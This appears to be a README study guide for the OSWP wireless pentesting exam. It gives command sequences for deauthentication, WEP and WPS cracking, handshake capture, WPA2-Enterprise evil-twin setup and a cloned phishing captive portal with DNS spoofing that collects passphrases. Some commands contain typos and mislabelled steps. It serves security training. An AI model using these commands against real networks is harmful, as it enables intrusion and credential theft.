OSWP-Study-Guide
OSWP-Study-Guide copied to clipboard
Study guide and command sheet for Offensive Security PEN-210 course (Offensive Security Wireless Pentester - OSWP)
OSWP-Study-Guide
Study guide and command sheet for Offensive Security PEN-210 course (Offensive Security Wireless Pentester - OSWP)
Dependencies
In order to run the following commands, install these frameworks first:
sudo apt install airmon-ng reaver hashcat hostapd dnsmasq nftables apache2 libapache2-mod-php freeradius
Open Network with MAC filtering
In the event that fake authentication persistently fails, it is plausible that MAC address filtering is being employed. Under such a scheme, the Access Point (AP) will only permit connections from a predefined list of MAC addresses. Should this be the scenario, it will be necessary to acquire a legitimate MAC address by monitoring network traffic with the aid of Airodump-ng. Subsequently, impersonation of this MAC address should be carried out once the corresponding client has disconnected from the network. It is imperative to refrain from initiating a fake authentication attack targeting a specific MAC address if the client remains active on the AP.
Packet capture
airodump-ng -w <CAPTURE_NAME> -c <CHANNEL> --bssid <BSSID> <INTERFACE>
Get your MAC address
macchanger --show <INTERFACE>
Fake authentication attack
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <YOUR_MAC> <INTERFACE>
ARP replay attack
aireplay-ng -3 -b <BSSID> -h <YOUR_MAC> <INTERFACE>
Deauthentication attack
aireplay-ng -0 1 -a <BSSID> -c <CLIENT_MAC> <INTERFACE>
Crack
aircrack-ng <CAPTURE_NAME>
WEP (Wired Equivalent Privacy)
WEP is a severely flawed security algorithm for IEEE 802.11 wireless networks. Below are the steps to exploit WEP vulnerabilities:
Step 1: Kill conflicting processes
sudo airmon-ng check kill
Step 2: Start monitor mode on wlan0
sudo airmon-ng start wlan0
Step 3: Scan for WEP networks
sudo airodump-ng wlan0mon --encrypt WEP
Step 4: Capture IVs
besside-ng -c Channel -b BSSID wlan0mon
Step 5: Crack WEP key
aircrack-ng ./wep.cap
Additional WEP Attacks:
WPS (Wi-Fi Protected Setup)
WPS was originally known as Wi-Fi Simple Configuration, aiming to unify vendor technologies for secure WPA/WPA2 passphrase sharing. However, it has its set of vulnerabilities. Below are the steps to identify and exploit WPS vulnerabilities:
Identifying access points with WPS enabled
wash -i <INTERFACE> -s
Fake authentication attack
aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <YOUR_MAC> <INTERFACE>
Offline brute force (pixie dust)
reaver -i wlan0 -b BSSID -SNLAvv -c 1 -K
Online brute force
reaver -i <INTERFACE> -b <BSSID> -SNLAsvv -d 1 -r 5:3 -c <CHANNEL_NUMBER>
WPA/WPA2/WPA3 Testing
Steps for testing security on networks with WPA/WPA2/WPA3 encryption, including setting up rogue APs and capturing handshakes:
WPA2 Enterprise
Follow these steps to set up wireless monitoring and perform the attack.
Step 1: Activate monitoring mode
airmon-ng check kill && airmon-ng start <interface>
Step 2: Check AUTH column
airodump-ng <interface>
Note: The AUTH column will say MGT.
Step 3: Capture the handshake
sudo airodump-ng -c channel -w ESSID interface
Step 4: Deauthenticate the client to capture the handshake
aireplay-ng -0 0 -a ESSID -c client_ESSID interface
Step 5: Analyze with Wireshark or tshark
After gathering the BSSID, ESSID, and channel:
- Use Wireshark or tshark with filters:
orwlan.bssid==E8:9C:12:02:66:AA && eap && tls.handshake.certificate
tls.handshake.type == 11,3
Step 6: Save certificates using OpenSSL
View the Packet Details in TLSv1 Record Layer >> Handshake Protocol >> Certificate:
openssl x509 -inform der -in cert.der -text
Details needed for the attack include: Issuer information.
Step 6.5 (Optional): Convert the certificate to PEM format
openssl x509 -inform der -in cert.der -outform pem -out output.crt
Step 7: Set up FreeRADIUS server
Install with:
sudo apt install freeradius
Edit the ca.cnf
and server.cnf
files to have less suspicious certificate authority fields.
sudo mousepad /etc/freeradius/3.0/certs/ca.cnf
sudo mousepad /etc/freeradius/3.0/certs/server.cnf
Update the respective sections with the correct information.
Step 8: Prepare the certificates
Navigate to /etc/freeradius/3.0/certs/
and run:
sudo rm dh && make
Note: Ignore the error from FreeRADIUS if it expects other configurations.
Step 9: Configure hostapd-mana
Edit /etc/hostapd-mana/mana.conf
with the correct SSID, Certificate paths, and EAP file.
Step 10: Set up mana.eap_user
Configure /etc/hostapd-mana/mana.eap_user
with the desired protocols and authentication methods.
Step 11: Start hostapd-mana
hostapd-mana /etc/hostapd-mana/mana.conf
Step 12: Use asleap to find a user
Run asleap with the correct command to find a user with a successful login.
<asleap command> -W /usr/share/john/password.lst
Step 13: Create wpa_supplicant.conf
file
Add the network configuration details:
network={
ssid="NetworkName"
scan_ssid=1
key_mgmt=WPA-EAP
identity="Domain\\username"
password="password"
eap=PEAP
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}
Step 14: Connect to the network
Use wpa_supplicant
to connect:
wpa_supplicant -c <config file>
Rogue Access Points
Instructions for creating a rogue AP.
Discovery
sudo airodump-ng -w capturename –output-format pcap wlan0mon
Wireshark Filters:
wlan.fc.type_subtype == 0x08 #Broadcast Frames
wlan.ssid == “apname” #AP name
Filters can be appended to filter for broadcast frames from a specific AP:
wlan.fc.type_subtype == 0x08 && wlan.ssid == “apname”
The interesting parts are in Tag: Vendor Specific: & Tag: RSN: Information
Creating a Rogue AP
Hostapd-mana template location:
/etc/hostapd-mana/hostapd-mana.conf
Or you may download the hostapd-mana.config in this repository and modify to your needs.
Start hostapd-mana:
sudo hostapd-mana hostapd-mana.conf
Cracking .hccapx Files
aircrack:
aircrack-ng name.hccapx -w /wordlist/rockyou.txt
If you run into errors, you may try:
aircrack-ng name.hccapx -e ESSID -w /wordlist/rockyou.txt
hashcat:
hashcat -m 2500 capture.hccapx /usr/share/worlists/rockyou.txt
Attacking Captive Portals
This guide provides step-by-step instructions for setting up a wireless network monitoring and attack environment.
1. Set Interface to Monitor Mode
Begin by capturing information about clients and access points (APs) around you:
sudo airodump-ng wlan0mon
2. Adjust the Capture
To specify the capture details, use:
sudo airodump-ng -w fileName –output-format pcap -c channelnumber interface
3. De-authenticate Connected Devices
Wait until the WPA handshake is captured:
sudo aireplay-ng -0 amountOfdeauths -a ApBSSID interface
4. Disable Monitor Mode
After completing the capture, disable monitor mode:
sudo apt install apache2 libapache2-mod-php
5. Download the Example Page
Use wget
to download the webpage. Here, -l2
means to go 2 levels deep:
wget -r -l2 https://www.website.com
6. Prepare the Web Directory
Create a directory for the phishing webpage:
sudo mkdir /var/www/html/portal && sudo mousepad /var/www/html/portal/index.php
7. Replicate the Website's Style
Replicate the styling of the example website page and copy the assets:
sudo cp -r ./www.website.com/assets /var/www/html/portal
8. Set Up the Login Page
Configure the login page to redirect to login_check.php
:
sudo mousepad /var/www/html/portal/login_check.php
9. Assign an IP address and activate the interface:
sudo ip addr add 192.168.87.1/24 dev wlan0
sudo ip link set wlan0 up
10. Ensure dnsmasq is installed:
sudo apt install dnsmasq
11. Create the DHCP config file at /home/kali/dnsmasq.conf
and add spoofing entries for top-level domains:
address=/com/192.168.0.1
address=/org/192.168.0.1
address=/net/192.168.0.1
12. For Windows 7 & 10 captive portal detection, add:
address=/dns.msftncsicom/131.107.255.255
13. Start dnsmasq with the config file:
sudo dnsmasq –conf-file=dnsmasq.com
14. Verify if dnsmasq is running successfully:
sudo tail /var/log/syslog | grep dnsmasq
15. Install nftables:
sudo apt install nftables
16. Add required rules:
sudo nft add table ip nat
sudo nft ‘add chain ip nat PREROUTING { type nat hook prerouting priority dstnat; policy; accept; }’
sudo nft add rule ip nat PREROUTING iifname “wlan0” udp dport 53 counter redirect to :53
17. Modify Apache configuration:
sudo mousepad /etc/apache2/sites-enabled/000-default.conf
18. Enable necessary modules and restart Apache:
sudo a2enmod rewrite && sudo a2enmod alias
sudo systemctl restart apache2
19. Check the portal by navigating to:
Firefox 127.0.0.1/portal/index.php
20. Install hostapd and edit the configuration:
sudo apt install hostapd && mousepad hostapd.conf
21. Create and run a 802.11n AP:
sudo hostapd -B hostapd.conf
22. Monitor the logs in two separate terminals:
- Terminal 1:
sudo tail -f /var/log/syslog | grep -E ‘(dnsmasq|hostapd)’
- Terminal 2:
sudo tail -f /var/log/apache2/access.log
23. Search for passphrase files in /tmp/
:
sudo find /tmp/ -iname passphrase.txt
24. Read the contents of the passphrase file:
sudo cat /tmp/systemd-private-b37…aef-apache2.service-b...i/tmp/passphrase.txt
Information Discovery Example
- ESSID of JesusIsTheWay
- BSSID of 34:5a:90:e0:5a:30
- WPS (AES/CCM)
- Uses a PSK
- Runs on channel 1
Definitions
- AP: Access Point
- BSSID: Basic Service Set Identifier is a 48-bit number that follows MAC address conventions.
- ESSID: Extended Service Set Identifier is a unique identifier to avoid interference on a wireless network.
Troubleshooting
- Make sure that hostapd-mana is installed on Kali. Default installations currently feature hostapd, hostapd-wpa and hostapd_cli. None of these frameworks feature the mana_wpaout section in the hostapd-mana.config, and will result in error: unknown configuration item 'mana_wpaout'
- When starting the exam, fist thing after connecting to the .ovpn is to test both SSH and RDP protocols to ensure connection works as intended.
- In order to list wireless interfaces, execute command:
sudo airmon-ng
- To restart Network Manager, execute command:
systemctl restart NetworkManager.service
Sources
Disclaimer and Legal Notice
Ethical Considerations and Legal Compliance
The techniques, commands, and procedures outlined in this guide are intended solely for educational purposes and preparing for the Offensive Security PEN-210 course (Offensive Security Wireless Pentester - OSWP). These techniques involve methodologies that, if misused, may constitute illegal activities. Users are strongly cautioned against engaging in any unauthorized and/or unlawful actions.
Scope of Use
- Authorized Environments Only: The execution of penetration testing, network attacks, and other tactics described herein should only be performed on networks and systems that are explicitly owned or authorized for testing by the user. This includes personal hardware, controlled environments, or environments for which explicit, documented permission has been granted.
- No Unauthorized Use: Under no circumstances should these techniques be applied to networks, systems, or devices without explicit authorization. Unauthorized use of these techniques may lead to legal consequences and is strongly condemned.
Exam Conduct
- Adherence to Exam Guidelines: While this guide serves as preparation material for the OSWP exam, users must strictly adhere to the guidelines, rules, and ethical standards set forth by Offensive Security during the examination.
- Prohibited Actions: Any attempt to use these techniques outside of the specified exam environment, or in a manner not aligned with the exam's rules, may result in disqualification, legal action, and other serious consequences.
Liability
- No Responsibility for Misuse: The authors, contributors, and associated entities of this guide accept no responsibility or liability for any misuse, damage, or illegal activities arising from the information presented. Users are solely responsible for their actions.
- Acknowledgment of Risk: Users acknowledge the risks involved in security testing and penetration testing and agree to ensure ethical and legal use of this information.
Continuous Learning and Ethical Growth
- Commitment to Ethical Hacking: Users are encouraged to pursue knowledge in cybersecurity and ethical hacking with a strong commitment to legal compliance, ethical behavior, and respect for privacy and data protection.
By using the information in this guide, you acknowledge having read, understood, and agreed to this disclaimer and all its terms. Your use of this information indicates your acceptance of the risks and your commitment to using this knowledge responsibly and ethically.